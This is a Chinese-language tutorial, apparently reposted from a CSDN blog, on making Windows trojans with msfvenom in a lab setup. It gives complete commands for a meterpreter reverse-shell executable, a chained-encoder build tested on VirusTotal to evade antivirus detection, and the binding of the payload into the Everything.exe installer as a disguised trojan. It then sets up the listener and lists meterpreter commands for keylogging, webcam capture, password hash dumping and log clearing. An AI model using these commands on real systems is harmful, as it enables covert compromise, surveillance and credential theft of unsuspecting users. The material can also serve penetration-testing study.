0


利用msfvenom制作windows木马及免杀马

实验环境:kali(10.250.70.251)

Windows x32位(10.250.70.252)

第一步:确保二者之间的网络能够相互ping通

         注意:linux可以ping通windows,但是windowsping不通linux,查看linux的网关,然后将windows的网关和linux网关配置一致即可相互ping通。

第二步:打开kali启动msfvenom,制作木马

制作常规的木马:

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.250.70.251  LPORT=5555 -f exe -o /root/a.exe

将该病毒放到windows上面

在windows上面打开杀毒引擎网站查看该病毒软件:

https://www.virscan.org/

https://www.virustotal.com/gui/home/upload

可以看到明显报错,查出来病毒较多

制作免杀的木马:

msfvenom -a x86 --platform -p windows/meterpreter/reverse_tcp lhost=10.250.70.251 lport=5555  -e x86/shikata_ga_nai -i 5 -f raw | msfvenom -e x86/alpha_upper -a x86 --platform windows -i 5 -f raw | msfvenom -e x86/shikata_ga_nai -a x86 --platform windows -i 10 -f raw | msfvenom -e x86/countdown -a x86 --platform windows -i 10 -x  -f exe -o /root/b.exe 

在windows上面打开杀毒引擎网站查看该病毒软件:

可以看到扫描出来的病毒明显减少

第三步:木马捆绑,(主程序启动之后子程序随之启动)

msfvenom -a x86  --platform windows -p windows/meterpreter/reverse_tcp lhost=10.250.70.251 lport=5555 -f exe -x Everything.exe  -o /root/Everything2.exe 

第四步:将生成的捆绑木马发到windows主机,并且打开msf的监听模块

msfconsole 
use exploit/multi/handler 
set lhost 10.250.70.251
set lport 5555
run

windows主机点击捆绑软件之后成功上线

附:meterpreter命令

meterpreter > ?

Core Commands 核心命令

Command                   Description
 -------                   -----------
 ?                         Help menu
 background               Backgrounds the current session
 bg                        Alias for background
 bgkill                    Kills a background meterpreter script
 bglist                    Lists running background scripts
 bgrun                     Executes a meterpreter script as a background thread
 channel                   Displays information or control active channels
 close                     Closes a channel
 detach                    Detach the meterpreter session (for http/https)
 disable_unicode_encoding  Disables encoding of unicode strings
 enable_unicode_encoding   Enables encoding of unicode strings
 exit                      Terminate the meterpreter session
 get_timeouts              Get the current session timeout values
 guid                      Get the session GUID
 help                      Help menu
 info                      Displays information about a Post module
 irb                       Open an interactive Ruby shell on the current session
 load                      Load one or more meterpreter extensions
 machine_id                Get the MSF ID of the machine attached to the session
 migrate                   Migrate the server to another process
 pivot                     Manage pivot listeners
 pry                       Open the Pry debugger on the current session
 quit                      Terminate the meterpreter session
 read                      Reads data from a channel
 resource                  Run the commands stored in a file
 run                       Executes a meterpreter script or Post module
 secure                    (Re)Negotiate TLV packet encryption on the session
 sessions                  Quickly switch to another session
 set_timeouts              Set the current session timeout values
 sleep                     Force Meterpreter to go quiet, then re-establish session
 ssl_verify                Modify the SSL certificate verification setting
 transport                 Manage the transport mechanisms
 use                       Deprecated alias for "load"
 uuid                      Get the UUID for the current session
 write                     Writes data to a channel

Stdapi: File system Commands

Command       Description
 -------       -----------
 cat           Read the contents of a file to the screen
 cd            Change directory
 checksum      Retrieve the checksum of a file
 cp            Copy source to destination
 del           Delete the specified file
 dir           List files (alias for ls)
 download      Download a file or directory
 edit          Edit a file
 getlwd        Print local working directory
 getwd         Print working directory
 lcat          Read the contents of a local file to the screen
 lcd           Change local working directory
 lls           List local files
 lpwd          Print local working directory
 ls            List files
 mkdir         Make directory
 mv            Move source to destination
 pwd           Print working directory
 rm            Delete the specified file
 rmdir         Remove directory
 search        Search for files
 show_mount    List all mount points/logical drives
 upload        Upload a file or directory

Stdapi: Networking Commands

Command       Description
 -------       -----------
 arp           Display the host ARP cache
 getproxy      Display the current proxy configuration
 ifconfig      Display interfaces
 ipconfig      Display interfaces
 netstat       Display the network connections
 portfwd       Forward a local port to a remote service
 resolve       Resolve a set of host names on the target
 route         View and modify the routing table

Stdapi: System Commands

Command       Description
 -------       -----------
 clearev       Clear the event log
 drop_token    Relinquishes any active impersonation token.
 execute       Execute a command
 getenv        Get one or more environment variable values
 getpid        Get the current process identifier
 getprivs      Attempt to enable all privileges available to the current process
 getsid        Get the SID of the user that the server is running as
 getuid        Get the user that the server is running as
 kill          Terminate a process
 localtime     Displays the target system local date and time
 pgrep         Filter processes by name
 pkill         Terminate processes by name
 ps            List running processes
 reboot        Reboots the remote computer
 reg           Modify and interact with the remote registry
 rev2self      Calls RevertToSelf() on the remote machine
 shell         Drop into a system command shell
 shutdown      Shuts down the remote computer
 steal_token   Attempts to steal an impersonation token from the target process
 suspend       Suspends or resumes a list of processes
 sysinfo       Gets information about the remote system, such as OS

Stdapi: User interface Commands

Command        Description
 -------        -----------
 enumdesktops   List all accessible desktops and window stations
 getdesktop     Get the current meterpreter desktop
 idletime       Returns the number of seconds the remote user has been idle
 keyboard_send  Send keystrokes
 keyevent       Send key events
 keyscan_dump   Dump the keystroke buffer
 keyscan_start  Start capturing keystrokes
 keyscan_stop   Stop capturing keystrokes
 mouse          Send mouse events
 screenshare    Watch the remote user desktop in real time
 screenshot     Grab a screenshot of the interactive desktop
 setdesktop     Change the meterpreters current desktop
 uictl          Control some of the user interface components

Stdapi: Webcam Commands

Command        Description
 -------        -----------
 record_mic     Record audio from the default microphone for X seconds
 webcam_chat    Start a video chat
 webcam_list    List webcams
 webcam_snap    Take a snapshot from the specified webcam
 webcam_stream  Play a video stream from the specified webcam

Stdapi: Audio Output Commands

Command       Description
 -------       -----------
 play          play a waveform audio file (.wav) on the target system

Priv: Elevate Commands

Command       Description
 -------       -----------
 getsystem     Attempt to elevate your privilege to that of local system.

Priv: Password database Commands

Command       Description
 -------       -----------
 hashdump      Dumps the contents of the SAM database

Priv: Timestomp Commands

Command       Description
 -------       -----------
 timestomp     Manipulate file MACE attributes
标签: windows 安全 linux

本文转载自: https://blog.csdn.net/qq_43332640/article/details/124072802
版权归原作者 林小陌啊 所有, 如有侵权,请联系我们删除。

“利用msfvenom制作windows木马及免杀马”的评论:

还没有评论